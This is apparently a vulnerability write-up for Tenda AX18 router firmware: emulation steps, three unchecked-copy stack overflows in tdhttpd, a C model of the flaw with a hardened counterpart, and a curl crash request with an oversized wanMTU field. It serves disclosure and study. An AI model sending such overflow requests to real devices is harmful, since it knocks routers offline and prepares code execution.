Tenda AX18 POC
Firmware download: https://www.tenda.com.cn/product/download/AX1806.html
After downloading, unpack it with binwalk.
The payload turns out to be a UBI image.
Install ubi_reader:
sudo apt install liblzo2-dev -y
sudo pip install python-lzo
sudo pip install ubi_reader
admire@DESKTOP-AK68JJT:/mnt/d/Downloads/Compose/US_AX1806V2.0br_V1.0.0.1_cn/_US_AX1806V2.0br_v1.0.0.1_cn_2990_ZGDX01_2.bin.extracted$ ~/.local/bin/ubireader_extract_images 100040.ubi
UBI_File Warning: end_offset - start_offset length is not block aligned, could mean missing data.
Extract the files from the UBI image (this only unpacks the UBIFS contents, nothing is decrypted):
~/.local/bin/ubireader_extract_files 100040.ubi
Install qemu. The qemu-arm-static binary used below is shipped by the qemu-user-static package, not by qemu-system, so install both:
sudo apt install qemu-system qemu-user-static -y
Start the httpd service, which in this firmware is called tdhttpd:
sudo qemu-arm-static -L . ./bin/tdhttpd
It comes up listening on port 80.
Set up the bridge (ens33 is the host NIC in this setup; substitute your own interface). dhclient gives br0 the address the emulated service is reached on later:
sudo apt install uml-utilities bridge-utils
sudo brctl addbr br0
sudo brctl addif br0 ens33
sudo ifconfig br0 up
sudo dhclient br0
Copy qemu-arm-static into the extracted rootfs and run tdhttpd inside a chroot, so that it resolves its libraries and configuration files from the firmware's own filesystem:
cp $(which qemu-arm-static) .
sudo chroot ./ ./qemu-arm-static ./bin/tdhttpd
Findings (sub_658D8 and v20 are IDA auto-generated names for an unnamed routine and a local variable):
fromAdvSetMacMtuWan calls sub_658D8, which copies a string without first checking the length of its input parameter.
form_fast_setting_wifi_set does not check the length of the timeZone parameter while handling it.
fromSetIpMacBind does no length check at all and unconditionally copies the content into the local variable v20.
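The pattern the three handlers share, as an added example that is not tdhttpd's code: a handler fetches one POST parameter and copies it into a fixed-size local buffer. handle_unsafe copies with strcpy and no check, as the three routines above do; handle_safe rejects anything that would not fit. The buffer size V20_SIZE (64), the frame layout with the saved return address placed right after the buffer, LR_MAGIC, the SLACK cushion and get_var (a stand-in for the real parameter lookup) are all assumptions made for the illustration; the real sizes and names are not on this page. It is written generically over the parameter name, so one routine covers wanMTU, timeZone and the fromSetIpMacBind input alike.

```c
/* Added example, not tdhttpd's code: models the unchecked-copy pattern.
 * V20_SIZE, the frame layout, LR_MAGIC, SLACK and get_var() are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define V20_SIZE 64            /* assumed size of the local buffer (v20) */
#define SLACK    512           /* cushion so the demo overflow stays inside one
                                  allocation; the real stack has no such cushion */
#define LR_MAGIC 0xdeadbeefu   /* hypothetical saved return address after v20 */

struct result {
    int      accepted;   /* 1 if the handler took the value, 0 if it rejected it */
    uint32_t saved_lr;   /* content of the saved-LR slot after the handler ran */
};

/* Simulated frame: v20 at offset 0, the saved LR immediately after it. */
static unsigned char *new_frame(void)
{
    unsigned char *mem = calloc(1, V20_SIZE + sizeof(uint32_t) + SLACK);
    uint32_t lr = LR_MAGIC;
    memcpy(mem + V20_SIZE, &lr, sizeof lr);
    return mem;
}

/* Read back the saved-LR slot and release the frame. */
static struct result read_result(unsigned char *mem, int accepted)
{
    struct result r;
    r.accepted = accepted;
    memcpy(&r.saved_lr, mem + V20_SIZE, sizeof r.saved_lr);
    free(mem);
    return r;
}

/* Stand-in for the real parameter lookup: kv is a NULL-terminated flat
 * key/value list; a missing key yields dflt. Constructed for the example. */
static const char *get_var(const char *const *kv, const char *key, const char *dflt)
{
    for (; kv[0] != NULL; kv += 2)
        if (strcmp(kv[0], key) == 0)
            return kv[1];
    return dflt;
}

/* Vulnerable pattern: the value is copied with strcpy and its length is never
 * compared with the buffer size, so a long value runs straight past v20. */
struct result handle_unsafe(const char *const *kv, const char *name)
{
    unsigned char *mem = new_frame();
    const char *val = get_var(kv, name, "");
    strcpy((char *)mem, val);      /* copies strlen(val)+1 bytes, whatever that is */
    return read_result(mem, 1);
}

/* Hardened pattern: reject anything that does not fit (terminator included),
 * then copy exactly the checked number of bytes. */
struct result handle_safe(const char *const *kv, const char *name)
{
    unsigned char *mem = new_frame();
    const char *val = get_var(kv, name, "");
    size_t n = strlen(val);
    if (n >= V20_SIZE)
        return read_result(mem, 0);
    memcpy(mem, val, n + 1);
    return read_result(mem, 1);
}

/* Builds a value of n 'A' bytes, like the padding the curl request sends. */
char *make_padding(size_t n)
{
    char *s = malloc(n + 1);
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char *pad = make_padding(79);                       /* constructed input */
    const char *benign[] = { "wanMTU", "1500", NULL };  /* constructed input */
    const char *evil[]   = { "wanMTU", pad,    NULL };
    struct result r;

    r = handle_unsafe(benign, "wanMTU");
    printf("unsafe, 1500 : accepted=%d saved_lr=0x%08x\n", r.accepted, (unsigned)r.saved_lr);
    r = handle_unsafe(evil, "wanMTU");
    printf("unsafe, 79xA : accepted=%d saved_lr=0x%08x\n", r.accepted, (unsigned)r.saved_lr);
    r = handle_safe(evil, "wanMTU");
    printf("safe,   79xA : accepted=%d saved_lr=0x%08x\n", r.accepted, (unsigned)r.saved_lr);
    free(pad);
    return 0;
}
```

Build with gcc -Wall and run: with 79 'A' bytes the unsafe handler ends with saved_lr=0x41414141, that is, the slot after the buffer now holds attacker bytes, which is the condition the curl request below provokes on the real target; the safe handler rejects the value and the slot still holds LR_MAGIC. Any padding of 68 bytes or more clobbers the whole slot under these assumed sizes.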
Test the vulnerability with curl (172.16.96.20 is the address br0 obtained in this setup; substitute your own). The expected result is that tdhttpd under qemu dies with a segmentation fault instead of returning a response:
curl -H "Content-Type: application/json" -X POST -d '{"wanMTU": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}' "http://172.16.96.20/goform/GetParentControlInfo"